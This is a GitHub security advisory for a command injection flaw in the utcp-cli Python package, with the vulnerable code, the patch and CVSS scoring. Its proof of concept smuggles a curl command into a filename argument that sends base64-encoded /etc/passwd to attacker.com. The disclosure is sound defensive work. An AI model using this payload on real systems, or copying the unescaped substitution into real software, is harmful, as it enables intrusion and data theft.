Skip to content

Command Injection via Unsanitized Argument Substitution in CLI Communication Protocol

High
h3xxit published GHSA-33p6-5jxp-p3x4 May 10, 2026

Package

pip utcp-cli (pip)

Affected versions

<= 1.1.1

Patched versions

1.1.2

Description

Summary

The _substitute_utcp_args method in cli_communication_protocol.py inserts user-controlled tool_args values directly into shell command strings without any sanitization or escaping. These commands are then executed via /bin/bash -c (Unix) or powershell.exe -Command (Windows), allowing an attacker to inject arbitrary shell commands.

Affected File

plugins/communication_protocols/cli/src/utcp_cli/cli_communication_protocol.py

Vulnerable Code

def replace_placeholder(match):
    arg_name = match.group(1)
    if arg_name in tool_args:
        return str(tool_args[arg_name])  # No escaping applied

The substituted command is then embedded directly into a shell script:

script_lines.append(f'{var_name}=$({substituted_command} 2>&1)')

And executed via:

shell_cmd = ['/bin/bash', '-c', script]

Proof of Concept

Given a tool defined as:

{"command": "python script.py --input UTCP_ARG_filename_UTCP_END"}

Calling with:

tool_args = {"filename": "data.csv; curl http://attacker.com/$(cat /etc/passwd | base64)"}

Produces and executes:

CMD_0_OUTPUT=$(python script.py --input data.csv; curl http://attacker.com/$(cat /etc/passwd | base64) 2>&1)

This results in full Remote Code Execution on the host system.

Patched

Fixed in utcp-cli 1.1.2. _substitute_utcp_args now shell-quotes every substituted value: shlex.quote on Unix, a PowerShell single-quoted literal on Windows. Each UTCP_ARG_..._UTCP_END placeholder therefore expands to exactly one shell token, blocking metacharacter injection (;, |, &, backticks, $(), newlines).

Behavior change: tools that relied on a single placeholder splitting into multiple shell tokens (e.g. UTCP_ARG_flags_UTCP_END -> --verbose --debug) must now use one placeholder per intended argument.

Mitigation

Upgrade to utcp-cli >= 1.1.2. There is no workaround in earlier versions short of refusing all attacker-controlled tool_args.

Credit

Reported by @ZeroXJacks.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVE ID

CVE-2026-45369

Weaknesses

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. Learn more on MITRE.

Credits